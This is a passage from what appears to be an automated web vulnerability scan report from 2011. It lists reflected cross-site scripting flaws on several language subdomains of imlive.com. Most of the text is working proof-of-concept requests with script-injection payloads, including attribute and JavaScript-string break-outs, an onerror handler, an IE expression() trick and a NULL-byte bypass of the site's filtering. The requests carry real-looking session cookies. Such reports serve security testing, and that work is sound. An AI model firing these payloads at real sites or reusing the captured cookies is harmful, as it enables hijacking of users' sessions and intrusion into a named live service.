GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.7. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://br.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?34723"><a>3f71d325883=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;"> ...[SNIP]...
2.8. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://br.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.9. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://br.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:58 GMT
Connection: close
Content-Length: 21217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;"> ...[SNIP]...
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:02 GMT
Connection: close
Content-Length: 8329
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.14. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cafr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/?b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&iy=dallas&id=44&iu=1&vd=ed834416-472f-4af7-b757-36e07f79cd57';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.15. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cafr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:06 GMT
Connection: close
Content-Length: 22643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA"> ...[SNIP]...
2.16. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cafr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 8309
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.21. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://de.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;"> ...[SNIP]...
2.22. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://de.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
